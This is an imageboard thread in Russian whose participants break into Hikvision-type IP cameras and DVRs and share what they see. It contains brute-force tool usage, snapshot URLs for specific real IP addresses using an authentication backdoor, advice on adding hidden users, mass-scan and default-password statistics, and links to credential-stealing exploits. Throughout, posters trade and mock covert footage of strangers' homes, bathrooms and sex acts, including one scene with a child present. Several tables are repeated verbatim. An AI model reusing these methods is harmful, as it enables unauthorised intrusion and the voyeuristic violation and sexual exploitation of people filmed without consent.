В targets.txt нужно вставить блоки IP. В logins и passwords должны быть ваши логины и пароли. В папку good будут сохранятся изображения с камер. После перебора можно подключиться к видеорегистратору при помощи программы IVMS-4200 http://overseas.hikvision.com/europe/Tools_84.html .
Полный список команд hikka:
-bf-threads int Bruteforcer threads count (default 1)
-check Check cameras (experimental and not fully tested, but very useful)
-csv string Write result to CSV
-json string Write result to JSON
-logins string A file with a list of logins to bruteforce (default "logins")
-m3u string Write result to m3u playlist
-passwords string A file with a list of passwords to bruteforce (default "passwords")
-port int Camera service port (default 8000)
-shoots string Download pics from cameras into a folder
-threads int Threads count (default 1)
Предыдущий тред: >>104004 (OP)
Сам не понял. Может морг какой. Или операционная. Но что то долго эта колбаска ливерная в зажимах на воздухе лежит для операционной то.
печень
- Бляяяя....
Походу на камере есть ЖД
$ ./info.sh -h 94.101.55.47
Snapshot URL:
http://94.101.55.47:80/Streaming/channels/1/picture?auth=YWRtaW46
Users:
<id>1</id><userName>admin</userName>
HDD:
<StorageVolume>
<id>1</id>
<volumeName>HDD1</volumeName>
<volumeType>VirtualDisk</volumeType>
<storageDescription>DAS</storageDescription>
<storageLocation>HDD</storageLocation>
<storageType>internal</storageType>
<capacity>14804</capacity>
<status>HD_NORMAL</status>
</StorageVolume>
DDNS:
XPath set is empty
Скрины конечно збс, но и по ним понятно, что кроме как скрина, более получить ничего нельзя. Этож сколько ты обновлял чтоб заполучить жопу)))
И кстати хата странная, дверь железная и тут же гостиная с кухней, справа еще проход, но куда? Да и окно рядом с дверью говорит о том что это явно не многоэтажка, а вообще первый этаж
пиздец ты конспиролог
Может планировка галерейная в доме.
С ваилдным Authorization юзеры и пасы добавляются/меняются на ура - стоит перейти на YWRtaW46 и усе :(
>Не видел ни одного пруфа
а тебе некто и не покажет, зачем дополнительно увелиивать армию школьников убивающие камеры...
Тот кто сам соображает, и программист с опытом, таким достаточно взглянуть на скриншот, и сразу понятно что, куда и как на самом деле надо подставлять чтоб добавить пользовтеля, все просто, но школьникам не хватает элементарных знаний, и это такой своеобразный фильтр от них
Я ПОНЯЛ КАК ПОЛЬЗОВАТЕЛЯ ДОБАВИТЬ!!!!
СУКА Я ТУПОЙ ПИЗДЕЦ, ЦЕЛЫЙ МЕСЯЦ ТУПИЛ, БЛЯТЬ!!!
А ТАК ВСЕ ПРОСТО ОКАЗАЛОСЬ!
кто не верит кидайте ip для теста
Только давайте камеру не из СНГ, а то вдруг это "хонейпот", стремно мне так палится. Также желательно чтоб камера была прикольная, в душе например или туалете, чтоб был хоть какойто профит от добавления пароля
азаза затролел...
Предложение еще актуально, кто хочет увидеть добавление пароля, давайте годную камеру не в СНГ
Камер полно, добавь пользователя хоть в одну, покажи что можешь, а там я еще подкину.
написал тебе на мыло
>а там я еще подкину.
или не подкинеш, а будеш точно знать что так можно, и у тебя появится стимул копать искать уязвимость
Хз, сначала я отснифил нажатие кнопки в интерфейсе, а потом пост куна о чеке на жесткий диск подтолкнул к решению...
И все равно лень что то делать
Ой не, вот этого не надо))
Что понаблюдать?
Скину 2 камеры с гомосеками, взамен годнота с обычными МЖ с еблями, скрины вашего, после отправлю гомосэков. пишите мыло.
Что то я все равно слишком тупой.
Итак и так посылаю запрос :/ уже 3-4 способа добавить юзера нашел - но, увы только с валидным паролем
Алсо, судя по https://www.cvedetails.com/vulnerability-list/vendor_id-13150/Hikvision.html а это список уязвимостей в хиквижене - есть еще баг, когда можно не добавлять юзера, а достать пароли из файла лол
Ну и да они там подсуетились и выпустили новую прошивку
https://ipcamtalk.com/threads/backdoor-found-in-hikvision-cameras.17523/page-5
Ну вот и школьники добрались.
Радости полные штаны.
Вы хоть юзеров удаляйте.
Time to say goodbye годным камерам теперь
https://www.youtube.com/watch?v=GjpI6tmIQco
нахуя?
Пиздец, как можно ебаться при детях. Я от кота даже закрываюсь, а эти прямо ебутся.
он ведь не знает, что весь двач на него смотрит через эту камеру. Знал бы, то не дрочил, думаю.
Некоторые, кстати, закрывают камеры перед еблей, уж не знаю исходя из каких соображений.
Я параноик, даже телефон подальше убираю, вебку закрываю и камеру на телике, лол
>>>105897
нет таких камер, это всё выдумки!!! Или я еблан и делаю что-то не так!!! Скорее второе, но вдоль и поперёк знаю изначальную тему, а что сейчас выдумали даже понять не могу, тыкал, пробовал, но херов как дров....А два года тут с вами сижу и поддерживаю!!
ты хоть ип какойто дал, а то добавить юзера по скрину, ни как не получится
я тоже первый раз его вижу. Он ночу хотел её трахнуть но она не хотела, боялась что ребёнок проснётся.
Пто vlc, птосто записал целый дени черзез веб интерфейс, потом открыл видео в vlc
пару дней назад как бы хотела, несколько раз ласкала писю но быстро останавливалась
1280x960, 4:13
IP плиззз
Такой вопрос. Ip-камеры пишут в архив? И если да, то возможно ли найти их в определенной локации? Интересует внешнее видеонаблюдение.
Если все это реально, запилю кулстори (не очень прохладную, но весьма российскую).
доставте жирух я знаю у вас есть
Алсо, годноты аля крипи плейс или спальных у меня много....
http://52.15.206.27/Streaming/channels/1/picture/?auth=YWRtaW46
Все еще реквестрирую пароль :(
https://geektimes.ru/post/292371/
Завидуешь?
Микрофон есть? Скинь ipшник, поиздеватся над дауномайнером
пиши сюда:
Судя по скрину в базе были не только дефолтные пароли
засветиться на дваче
Блять, это она обычным оливковым маслом её натирает?
<!DOCTYPE html>
<html><head><title>Document Error: Method Not Allowed</title></head>
<body><h2>Access Error: 405 -- Method Not Allowed</h2>
<p>Method PUT not supported by file handler at this location </p>
</body>
</html>
Че за херь? Намекните хоть немного, я пойму дальше сам
владелец если следит за камерой, большинство следят, удалит нового пользователя
настройки не меняю
> большинство следят
Ты бредеш чтоли? Как ты себе это представляеш? Просыпается такой утром владелец камеры и перед завтраком идет проверять не появились ли новые пользователи на камере, и так каждый день??
На камеру он зайдет только если его пользователь перестанет работать или сама камера перестанет работать, а если аккуратно добавить нового пользователя, не трогая остальных, то владелец в жизне не заметит этого...
Ну аннончики, ну намекните как добавить Пермишинов пользователю добавленному через ?auth=YWRtaW46, сломал себе уже весь мозг
Как ты права устанавливаешь?
Я когда добавляю пользователя он сразу с правами добавляется. Правда работает только через веб интерфейс. Когда подключаясь через ивмс логинится, но стрим стореть не могу. Говорит нет прав
>Как ты права устанавливаешь?
никак, прав нет, при попытке их установить говорт это >>06838
>Я когда добавляю пользователя он сразу с правами добавляется.
Мы с тобой об одном и томже говорим, ты добавляеш через ?auth=YWRtaW46 ?
Я добавляю пользователя типа Operator, но у него не одна галочка remotePermission не стоит, поставить сам их не могу нет прав, хотя в вебпанель заходит, но делать там ничего не могу, немогу смотреть трансляцию, немогу смотреть записи, немогу подключиться через iVMS, не могу подключится через RTSP
> Когда подключаясь через ивмс логинится
У меня даже этого нет говорит неверный логин пароль
при попытке зайти через ivms
>У меня даже этого нет говорит неверный логин пароль
>при попытке зайти через ivms
Точнее говорит "The user is locked", но суть таже не пускает
User is locked говорит когда ты пароль несколько раз неправельно введёш и система блокирует его. Это ничего не имеет общего с правами
Блокируются у которых стоят новые прошивки и прописано что блокировать к примеру через 5 неудачных подключений
>Как ты пытаешся добавить права? каким запросом?
PUT XML в UserPermission или UserPermission/<id>
>>06844
>Блокируются у которых стоят новые прошивки и прописано что блокировать к примеру через 5 неудачных подключений
Да это я уже понял, но когда он разблокируется то пишет что пароль не верный (хотя он верный, просто прав нет)
1920x1080, 1:30
При наличии знака 5.15.1 и намерении продолжить движение прямо, велосипедист должен спешиться и перейти проезжую часть как пешеход. В соответствии с пунктом 8.3. ПДД водитель при съезде с дороги обязан уступить дорогу пешеходам путь движения которых он пересекает.
куда прямо? не видишь разметки? движение по полосе только направо. куда перейти? ты видишь пешеходный переход уёбок?
>из нее еще корм для попугайчиков делают
скриптом годноту всю понаходили, пароли/порты поменяли, там прах и тлен
Создаю оператора, захожу в веб интерфейс - все нужные галочки стоят.
Подключаюсь через ivms - нет доступа
Не спорь со мной неуч. По существу есть что возразить? Чтобы велосипедисту стать пешеходом надо спешится. «8.3. При выезде на дорогу с прилегающей территории водитель должен уступить дорогу транспортным средствам и пешеходам, движущимся по ней, а при съезде с дороги — пешеходам и велосипедистам, путь движения которых он пересекает».
upd
4.1. Пешеходы должны двигаться по тротуарам, пешеходным дорожкам, велопешеходным дорожкам, а при их отсутствии — по обочинам.
up, аноночики намекните - надо ди париться с md5 хуйней в пермиссионе?
> Выезд на дорогу с прилегающей территории
Я на права давно сдавал , но это же хуйня про выезд из двора/парковки на дорогу
пешеблядь, плз
«Прилегающая территория» — территория, непосредственно прилегающая к дороге и не предназначенная для сквозного движения транспортных средств (дворы, жилые массивы, автостоянки, АЗС, предприятия и тому подобное). Движение по прилегающей территории осуществляется в соответствии с настоящими Правилами.
В данном случае это и есть прилегающая территория, не перекресток. Pic related. Впрочем на перекрестке велосипедисту нужно двигаться также, только п. 8.3 заменяется на 4.3.
Блать, digest auth принимает только верный пасс ^_^
но, эта фигня брутабельна :0
Ну же , анончики, намекните как добавить права
выше же писал
Короче, пиндосы покупали у китайцев эти камеры, хитрые узкоглазые встроили анальный эксплоит.
Естественно, утаить им этот факт не удалось :) Вот мы теперь и наслаждаемся.
Это салон на второй?
долбоёб! никогда не меняй пароль у админа
Нет бы помочь анону, твоему постоянномуд ругу и собеседнику. Какие же вы все-таки пидоры, хуй я вам еще что-то выложу.
нароботки в чем у тебя?
Я хз, содержится в нем пас или нет.
Попробуй выкачать файл, сбросить админа и восстановиться.
Заодно и нам сообщи *_^
Да пиздеж это все, через HikCGI (в котором нашли дырищу) нельзя изменять/добавлять права у пользователей, а по остальным протоколам (ISAPI, PSIA) нужно авторизоваться с правильным паролем для внесения изменений. Вот configfile по идее можно дешифровать и вытащить от туда пароль, только я хз как
Хотя вру, это я дерево, оказывается надо в веб-версии логиниться с созданными юзерами, тогда работает, в ivms пишет no permission
многие регистраторы не поддерживают веб-версии и наоборот
Весь функционал видно на скрине
Не на всех камерах нормально (с правами добавляется юзер)
Должна быть java установлена.
Из консоли: java -jar HikkaTools.jar ipшник
Сорцы https://github.com/taclomoto/HikkaTools
Готовый файл http://rgho.st/7glMXcc8T
Если есть замечания, предложения - пишите в тред.
Два чая анончик.
bash expect
SERG
правда зачем такой хуйней заниматься, добавил юзера и смотри сколько угодно
ИДИ НАХУЙ ШКОЛЬНИК ОТСЮДА.
1) часть снимков выходит битая - не только jpg качается
Запилил на окна на Си.
1) По первым тестам, это не другой формат, а отказ в доступе и прочая мутатень типа: (Как я понял, могу ошибаться)
HTTP/1.1 401 Unauthorized
<?xml version="1.0" encoding="UTF-8" ?>
<ResponseStatus version="1.0" xmlns="urn:psialliance-org">
<requestURL>/Streaming/channels/1/picture/</requestURL>
<statusCode>4</statusCode>
<statusString>Invalid Operation</statusString>
</ResponseStatus>
<!DOCTYPE html>
<html><head><title>Document Error: Unauthorized</title></head>
<body><h2>Access Error: 401 -- Unauthorized</h2>
<p>Authentication Error: Your client does not have permission to get URL /Streaming/channels/1/picture/ from this server.</p>
</body>
</html>
> 1) часть снимков выходит битая - не только jpg качается
Проверяй content type в хидеое
> Запилил на окна на Си.
Если это какой либо DownloadToFile - то будут муки с 1
> 1) По первым тестам, это не другой формат, а отказ в доступе и прочая мутатень типа: (Как я понял, могу ошибаться)
Эксплоит та хрень с auth юзай
Через SOCKET, по GET запросу, прием данных через recv();
Content-Type: image/jpg
Все остальное дичь, которую описывал вверху.
Сейчас влепил строковые функции на вхождение и копирование строк, и breakанул эту дичь до цикла,
Процесс пошел быстрее без зависания.
Пока 1 одном потоке.
*
Говна правда немерено, картинок маловато, правда просканил всего 500-600 ипов.
То что сказал, гляну...
Прикрутил timeout к socket на ответ хоста, скорость самолет стала.
Единственное, что заметил, что с такой скорость, после 2-3 прогона по одному и тому же списку ипов, на 4 ты получаешь бан или что-то вроде этого:) через 5-10 минут снова прогоняется.
что за бан?
Давай под FireFox расскажи, с него буду смотреть.
>Методичку почитай, там несколько фооматов может быть
Да мне сейчас без разницы я завязал ее на jpg, png, bmp. Все три жрет и отправляет файлом ко мне.
А то что на скрине, выводит какой Content-Type, для себя прикрутил для теста...
>На некоторых камерах юзер создаётся нормально, но ивмс права не видит.
>Но можно через ртсп подключаться и т.д. и т.п.
Вот это странная дичь, причем, если зайти под админом и перекликать галочки, все норм работает... Возможно, что IVMS работает по другому ведь вся схема идет по 80/TCP,UDP (HTTP (HyperText Transfer Protocol), а IVMS на 8000/TCP,UDP iRDMI (Intel Remote Desktop Management Interface)
Или я несу чушь)))
Хз, сейчас сканил камеры
С первого диапазона ( /8 ) всего 8 камер
С второго 66 ( а всего ип с открытым 8000 и 80 портом было ~9700)
Вот и сказочки конец, кто успел тот молодец
Нужно искать и другие порта. Вот что в моей базе (взято с шодана)
MariaDB [sh]> select http_port, count(*) as c from sh3 group by http_port order by c desc;
+-----------+--------+
| http_port | c |
+-----------+--------+
| 80 | 313117 |
| 81 | 238664 |
| 82 | 137752 |
| 83 | 93067 |
| 84 | 65673 |
| 88 | 30076 |
| 443 | 23715 |
| 8080 | 14396 |
| 8081 | 9215 |
| 8090 | 7443 |
| 8001 | 4542 |
| 9000 | 2072 |
| 8888 | 1732 |
| 444 | 1711 |
| 8086 | 1624 |
| 8000 | 1313 |
| 7071 | 1290 |
| 8010 | 1240 |
| 9001 | 1222 |
| 8181 | 1199 |
| 5000 | 1114 |
| 8089 | 1035 |
| 8008 | 845 |
| 5001 | 836 |
| 9002 | 789 |
| 32400 | 718 |
| 311 | 663 |
| 10000 | 638 |
| 8009 | 595 |
| 8889 | 530 |
| 3000 | 439 |
| 9080 | 398 |
| 8098 | 391 |
| 3001 | 381 |
| 8443 | 357 |
| 8880 | 344 |
| 8060 | 335 |
| 1234 | 326 |
| 7777 | 324 |
| 631 | 319 |
| 5555 | 314 |
| 4443 | 298 |
| 2082 | 292 |
| 8112 | 282 |
| 1400 | 266 |
| 8800 | 247 |
| 2083 | 235 |
| 4040 | 230 |
| 8140 | 220 |
| 1311 | 220 |
| 8139 | 199 |
| 2086 | 196 |
| 1471 | 195 |
| 9009 | 192 |
| 2087 | 183 |
| 9191 | 181 |
| 8069 | 177 |
| 1741 | 176 |
| 2480 | 171 |
| 2375 | 162 |
| 2376 | 162 |
| 9443 | 157 |
| 9200 | 152 |
| 3128 | 145 |
| 3541 | 140 |
| 3780 | 133 |
| 7779 | 132 |
| 4567 | 130 |
| 5900 | 129 |
| 4022 | 127 |
| 3689 | 125 |
| 3749 | 123 |
| 5560 | 119 |
| 3542 | 118 |
| 5901 | 116 |
| 8834 | 114 |
| 5985 | 113 |
| 5601 | 113 |
| 3790 | 112 |
| 5357 | 112 |
| 4848 | 110 |
| 5986 | 109 |
| 9595 | 108 |
| 8334 | 105 |
| 49153 | 102 |
| 9981 | 100 |
| 5984 | 99 |
| 6664 | 97 |
| 7474 | 96 |
| 10243 | 94 |
| 1080 | 93 |
| 7657 | 91 |
| 9944 | 89 |
| 4664 | 85 |
| 9943 | 85 |
| 7548 | 83 |
| 4782 | 81 |
| 9869 | 79 |
| 50070 | 77 |
| 55553 | 74 |
| 49152 | 74 |
| 16992 | 70 |
| 13579 | 69 |
| 55443 | 67 |
| 16993 | 65 |
| 7547 | 64 |
| 51106 | 62 |
| 25105 | 55 |
| 23424 | 53 |
| 28017 | 50 |
| 51080 | 18 |
| 49955 | 9 |
| 21 | 1 |
| 85 | 1 |
+-----------+--------+
114 rows in set (0.29 sec)
Нужно искать и другие порта. Вот что в моей базе (взято с шодана)
MariaDB [sh]> select http_port, count(*) as c from sh3 group by http_port order by c desc;
+-----------+--------+
| http_port | c |
+-----------+--------+
| 80 | 313117 |
| 81 | 238664 |
| 82 | 137752 |
| 83 | 93067 |
| 84 | 65673 |
| 88 | 30076 |
| 443 | 23715 |
| 8080 | 14396 |
| 8081 | 9215 |
| 8090 | 7443 |
| 8001 | 4542 |
| 9000 | 2072 |
| 8888 | 1732 |
| 444 | 1711 |
| 8086 | 1624 |
| 8000 | 1313 |
| 7071 | 1290 |
| 8010 | 1240 |
| 9001 | 1222 |
| 8181 | 1199 |
| 5000 | 1114 |
| 8089 | 1035 |
| 8008 | 845 |
| 5001 | 836 |
| 9002 | 789 |
| 32400 | 718 |
| 311 | 663 |
| 10000 | 638 |
| 8009 | 595 |
| 8889 | 530 |
| 3000 | 439 |
| 9080 | 398 |
| 8098 | 391 |
| 3001 | 381 |
| 8443 | 357 |
| 8880 | 344 |
| 8060 | 335 |
| 1234 | 326 |
| 7777 | 324 |
| 631 | 319 |
| 5555 | 314 |
| 4443 | 298 |
| 2082 | 292 |
| 8112 | 282 |
| 1400 | 266 |
| 8800 | 247 |
| 2083 | 235 |
| 4040 | 230 |
| 8140 | 220 |
| 1311 | 220 |
| 8139 | 199 |
| 2086 | 196 |
| 1471 | 195 |
| 9009 | 192 |
| 2087 | 183 |
| 9191 | 181 |
| 8069 | 177 |
| 1741 | 176 |
| 2480 | 171 |
| 2375 | 162 |
| 2376 | 162 |
| 9443 | 157 |
| 9200 | 152 |
| 3128 | 145 |
| 3541 | 140 |
| 3780 | 133 |
| 7779 | 132 |
| 4567 | 130 |
| 5900 | 129 |
| 4022 | 127 |
| 3689 | 125 |
| 3749 | 123 |
| 5560 | 119 |
| 3542 | 118 |
| 5901 | 116 |
| 8834 | 114 |
| 5985 | 113 |
| 5601 | 113 |
| 3790 | 112 |
| 5357 | 112 |
| 4848 | 110 |
| 5986 | 109 |
| 9595 | 108 |
| 8334 | 105 |
| 49153 | 102 |
| 9981 | 100 |
| 5984 | 99 |
| 6664 | 97 |
| 7474 | 96 |
| 10243 | 94 |
| 1080 | 93 |
| 7657 | 91 |
| 9944 | 89 |
| 4664 | 85 |
| 9943 | 85 |
| 7548 | 83 |
| 4782 | 81 |
| 9869 | 79 |
| 50070 | 77 |
| 55553 | 74 |
| 49152 | 74 |
| 16992 | 70 |
| 13579 | 69 |
| 55443 | 67 |
| 16993 | 65 |
| 7547 | 64 |
| 51106 | 62 |
| 25105 | 55 |
| 23424 | 53 |
| 28017 | 50 |
| 51080 | 18 |
| 49955 | 9 |
| 21 | 1 |
| 85 | 1 |
+-----------+--------+
114 rows in set (0.29 sec)
Раньше я бы получил на порядок больше камер с диапазона...
Надо чтоб остальные аноны подтвердили :/
Гоу обмен годнятиной
У меня не халявный.
Да, но из этих где-то 20% работчих
Неа, нету
Тян няшная, но в этой комнате только спит и максимум колготки снимает/до трусов и лифчика оголяется
На фотке кстати момент когда она из жопы что то пробует на вкус
>Тян няшная, но в этой комнате только спит и максимум колготки снимает/до трусов и лифчика оголяется
Регулярно такое встречается
Звук есть?
Любит пожрать видать. Как так вышло, что одна камера и с записью? Я такую годноту лютую встречаю по 3-5 камер, а харда нет. А уж если одна камера всего, то 100% без записи.
лол, она что, камеру не видела что ли?
обмен возможен, мб скины покажешь?
цп камера?
1280x720, 0:07
ебать норм
жесткий диск
дубина ебаная, датчик движения это дд
пидарасы
ЗАйди на любой регистратор, где в настройках есть раздел "Камера". Туда можно добавить свой ай-пишник и учетку от него. Запись будет идти на этот регистратор
1280x720, 0:05
Не так просто ... когда добавляю юзера, через веб подключается а через ивмс(порт 8000) никак. Другие регистраторы подключаются через порт 8000 так что никак не получиться
Вчера так же дрочил, забыл камеру отвернуть в сторону, как я всегда обычно делаю, и камера у меня в том же месте находится.
а что нибудь такое же с тян есть?
да, но это не долго. Бери какие-то склады желательно, там охранники обычно не лазят по настройкам. Да если и увидит на свободном канале твою запись, то будет только рад
952x560, 3:22
Шликает как под одеялом, так и над ним
Поменя на подобную
Знаю логин, и что пароль в диапазоне 1000-100000
Hikka брутит только на :8000 ?
Спасибо )
Порт поменял
Но проблема: специально решил проверить на камере с рабочей комбинацией
вписал ip, 1 логин и 1 пароль
в браузере просит авторизацию а hikka выдает: is dead
Это может быть связано с тем, что камера не hikvision?? и есть ли решение?
Как понять на камере? я вписал порт камеры в start.bat:
hikka -threads 200 -check -shoots pics -port 81
Ну давай разбираться.
У этих камер ( и китайских подделок под хику ) есть три порта
1. ртсп порт - для передачи видео и т.д. и т.п. По дефолту вроде ~540
2. Веб порт - для веб интерфейса, вебапи По дефолту 80
3. Админ порт - для управления через проги ( ивмс и прочая хрень ) Обычно 8000
Хика брутит как раз админ порт, а твой 89 это скорее порт от веб интерфейса
Алсо, во многих камерах включена защита от брутфорса - то есть 5-6 попыток и получаешь бан ( на веб интерфейсе точно работает, а вот как с хиккой я не знаю) , но думаю гиблое это дело....
Если есть веб интерфейс, то лучше проверь на эксплоит
Теперь понятно, спасибо! Все верно, это был веб
А вебка на одном из этих портов, или как правило на всех трех?
А то сколько камер перелопатил с shodan, практически всегда либо 80 либо 8000, но не с нулями а 81-99, 8080 8090 и тп..
А с hikka и 8000 у меня стразу не заладилось )
Просканил блоков по моему на 200000ip выдало только 3 результата, и те не сломались в hikka
Не представляю сколько времени у вас уходит, но и вебки зато попадаются в hd и со звуком
проверь почту
Ну и, приволок скрины с вбыдлятне и доволен?
В веб интерфейсе аналогично вылетает: захожу, через минуту выкидывает, и пишет заблокировано на 30 мин или не правильный логин/пароль
У них прошивка была кривая, сейчас ее исправили, хозяева твоей камеры видимо не делали обновление
Годное что то на ней?
В обмен дам 4 годные камеры!
Вечером буду напишу,что бы сразу по факту,ты согласен на обмен?
В общем такое дело, я все это дело и ОП -поста запилил в ГУИ, все раскидал по полочкам, только вбивай айпи и получай джепеги. Но это не суть, ради чего это все? Я хочу как-то автоматизировать перебор картинок и ихкатегоризацию, улица, дом, сиськи, машины итд, вот и думаю на сколько это реально, как прикрутить api аля google images, никто не задумвался?
Скачай сканер портов и просканируй 0 -65000 порты на цели, софт например nmap/ zenmap (gui)
Все зависит от канала и железки, я запустил на ночь около 100 миллионов айпишников. на утро они были все прочеканы
Да реально конечно, прикрути классифицирующую нейроночку, и все дела.
Только вот готовой натренированной нейронки под это дело ты не найдешь, всякие там ImageNet на 1000 классов будут работать хреново, сиськи они не увидят, только машины, и даже улица/дом будут различать с трудом, потому что предназначены не для этого.
А чтобы самому натренировать, нужно предварительно разметить датасет, т.е. хотя бы пару десятков тысяч картинок классифицировать, желательно побольше. Ты готов это сделать? Размечай, выкладывай, будет нейронка.
Вот тут чуваки попытались что-то сделать без датасета, результат сомнительный
https://goo.gl/AAQas2
Дома буду, договоримся
Теперь что, каждой камере присваиваются рандомные логин и пароль?
7662хиккой годноты не найдешь
"Immediately upgrade or disconnect all Hikvision products from the internet or untrusted networks, or at least implement network access control rules that only allow trusted IP addresses to initiate connections to vulnerable devices. Keep in mind that many Hikvision IP cameras come with UPNP enabled by default and can expose themselves to the internet automatically. Hikvision released firmware updates for many camera models where backdoor code is removed. If an update is available for your device, you should install it as soon as possible."
это было неизбежно
Проверил через шодан, как он выдавал в среднем полтора лямов камер, так и выдает, на данный момент даже больше 1,602,990
То что многие меняют дефолтный пароль, это факт и он давно известен
Заметил кстати у многих, у кого дефолтный пароль стоит, заведена как минимум еще одна учетка и там стоит "сложный" пароль, но мы то заходим под админом
Да, на дефолте пока еще встречаются годные камеры, нахожу их довольно регулярно
Я про вот эту уязвимость http://seclists.org/fulldisclosure/2017/Sep/23
Если ты не заметил последние два треда мало кто брутил это дело хиккой.
Я думаю что мало кто читает такого рода новости, да и как они сами пишут надо знать какая у тебя камера, китайская или европейская...
Большинство брутит хиккой за неимением
Это количество вебморд которые под хикавижн и рвэй только.
Уязвимы по своей сути все.
Разрабы тоже не дремлют и делают обновления которые сейчас толком не дают брутить, дают но ограниченное количество раз (6), потом камера блокируется
У многих эти обновления не стоят
HD камеры много где есть, не только на хиккавижне
У меня есть архив, небольшой на пару терабайтов
Слепил брутер. Брутил всю ночь 700к камер (шодан) на
admin:admin
66666:66666
88888:88888
Вот что получилась
+--------------+----------+
| loginErrorNo | count() |
+--------------+----------+
| -1 | 9 |
| 0 | 174368 |
| 1 | 4263 |
| 2 | 240404 |
| 3 | 61459 |
| 4 | 43 |
| 5 | 377 |
| 6 | 136 |
| 7 | 499 |
| 8 | 1552 |
| 9 | 226859 |
| 10 | 6 |
| 11 | 1096 |
| 12 | 1 |
| 14 | 1 |
| 17 | 4016 |
+--------------+----------+
0 - ОК
1,2,5,6 - Пароль непревельный или нету такого пользователя
3,7,8,9,10 - Не отвечает
Остальные разные проблемы
А вот и статистика на пароли
+--------+----------+----------+
| login | password | count() |
+--------+----------+----------+
| 666666 | 666666 | 39715 |
| 888888 | 888888 | 2039 |
| admin | admin | 133057 |
+--------+----------+----------+
Получается 25% на дефолтных паролях!! Пиздец!
Сейчас качая скрины.
Слепил брутер. Брутил всю ночь 700к камер (шодан) на
admin:admin
66666:66666
88888:88888
Вот что получилась
+--------------+----------+
| loginErrorNo | count() |
+--------------+----------+
| -1 | 9 |
| 0 | 174368 |
| 1 | 4263 |
| 2 | 240404 |
| 3 | 61459 |
| 4 | 43 |
| 5 | 377 |
| 6 | 136 |
| 7 | 499 |
| 8 | 1552 |
| 9 | 226859 |
| 10 | 6 |
| 11 | 1096 |
| 12 | 1 |
| 14 | 1 |
| 17 | 4016 |
+--------------+----------+
0 - ОК
1,2,5,6 - Пароль непревельный или нету такого пользователя
3,7,8,9,10 - Не отвечает
Остальные разные проблемы
А вот и статистика на пароли
+--------+----------+----------+
| login | password | count() |
+--------+----------+----------+
| 666666 | 666666 | 39715 |
| 888888 | 888888 | 2039 |
| admin | admin | 133057 |
+--------+----------+----------+
Получается 25% на дефолтных паролях!! Пиздец!
Сейчас качая скрины.
Я говорил и не раз что много у кого дефолтные пароли оставлены
Поделись
Как вы делайте что бы сохранить скрины один за другим и быстро
Обьесняюсь:
Скрин делается в двух этапов.
1. регестрирование callback функций
CLIENT_SetSnapRevCallBack(snapRev, userData)
2. запрос CLIENT_SnapPicture каторая как-то запускает callback функцию в бэкграунд потамучто сразы выходит
Если делать запросы один за другим то callback функция вобше не запускается а если добавить sleep v 1-2 секунды то работает но всё равно ести пропущеные скрины
Желающие помочь пишите сюда videowmod @ mail.ru
http://prntscr.com/hd097i
http://prntscr.com/hd0cw5
глянь почту
http://prntscr.com/hdfgt7
http://prntscr.com/hdfr7o
http://prntscr.com/hdfsqj
http://prntscr.com/hdfw6n
Отправил
Пароль?
нахуй пошёл, не тебе скрины заливал
мда ... у меня более 500к скринов с южной америке нужно неделю чтоб всё просмотреть. Серийный номер этих камер не подскажешь?
https://prnt.sc/hds51e
https://prnt.sc/hdsbbh
Обмен videowmod @ маил.ru это 37777, шлите свои скрины
перебирать эти скрины еще, замарачиваться, искать... есть кто это делает.
https://vk.com/smartpssivms и группа есть...
а тут ваще уже все напиленное https://vk.com/spycamhome и покупать не надо.
Реклама?
>203.56
нет, этой у меня нет. Такие появляются почти каждый день. Я не пойму, то ли юзеры прохавывают и что-то делают или обновляется прошивка. Такое чувство, что для админа запрещается логин из интернета
начинают дохнуть камеры, которые смотрел около года
это что?
У кого есть время всё это просмотреть вот ссылка
https://cloud.mail.ru/public/23jC/8DFsiuzdF
Найдёте годноту пишите на
Скрины маленкие но достаточно чтоб понять что на картинке. Оригиналы вешут в 20 раз больше поэтому и сгенерировал thumbs
да, 1.5М картинок, нету времени
Скачал
Такое чувство что их уже перебирали, есть пропуски
Слишком сильно уменьшена картинка, приходится напрягаться чтобы разглядеть
Нашел вроде как салон красоты только
Отсмотрел не все еще
а сам то хули тут делаешь? А отсюда сразу в сисси тред пойдешь, да? девушка у него, лол
Любое колличество паролей и логинов
https://2ch.hk/web/res/108424.html (М)
http://prntscr.com/hiatv4
Поменяюсь, есть куча камер
videowmod @ маил.ru, шлите свои скрины
Так какой версии фреймворк и редисты нужны? Не могу запустить на семерке. Под 64 битную винду собиралось или можно и на 32?
как ты сделал столько трансляций в одном окне?
Нахуй жена, когда есть соседка?
Хорошое качество и активность
Это все только с лупой смотреть, а так камеры нечего, посмотрел бы их в хорошем разрешении
И на кой ты сюда наркоманов притащил?
Вижу только ужасно низкое разрешение и ремонт, я у себя такие камеры не оставляю
Думаешь что там джамшуты шпилятся?
залей видео всего сеанса с девочками
Да. Помогите вскрыть!
Видать все в трусы слил, до меня ни капли не долетело
Велосипедист - транспортное средство.
Он должен был ехать, как и ехал. Ну мб чуток левее, чтобы обозначить свою позицию на полосе.
>Велосипедист - транспортное средство.
Нет. Велосипедист — лицо, управляющее велосипедом.
>Он должен был ехать, как и ехал.
Нет, он должен был действовать как я написал. Не согласен? Аргументируй свою позицию со ссылками на ПДД, как и я.
https://t.me/joinchat/GYMmYRGXfJiZT6d0zPw8cQ
640x352, 0:13
На второй секунде на изображении проскакивает что-то полупрозрачное снизу вверх. Первый раз в районе второго столба слева от ворот. Второй раз на 3-4 секунде примерно по центру ворот.
Дело происходит ночью в марте, вокруг снег, пыли и тепла вроде нет.
Моё мнение, что это какой-то далёкий блик или переотражение внутри объектива от каких-нибудь дальних фар или капель воды или чего-то такого.
Электромагнитные наводки внутри оборудования?
Если бы это падало, было бы понятнее, но оно движется снизу вверх.
Или всё же нужно спасаться, потому что началось?
>но оно движется снизу вверх
Линза переворачивает изображение. Мое мнение - что-то падает между линзой и матрицей. Капли конденсата, иней, или что-то еще.
только а не могу воспроизвести вебм?
https://github.com/ezelf/CVE-2018-9995_dvr_credentials
Эсплоит тянет пароли. Ничего брутить не надо.Проверил, патишет.
Только учитывайте что логи с IP все пишутся там и на некоторых моделях логи удалить нельзя
Молодец что спалил в этом рыготном треде!
Красавчик просто!
Радует только, что на этом скрипте далеко не уедут.
Да это тема вообще вся бесполезная и время затратная, так что тут нечего палить то особо. Да и 80% тут сидящих скрипт не смогут запустить без мануала и картинок
Именно с этим скриптом да.
Если как следует причесать Exploit, убрать python, обернуть в многопоточность, сделать вывод в файл и найти http request for snapshot, то это уже бомба.
Но это же конечно никто делать не будет
Как только появляется брют для массового пользователя годноты не остаётся совсем.
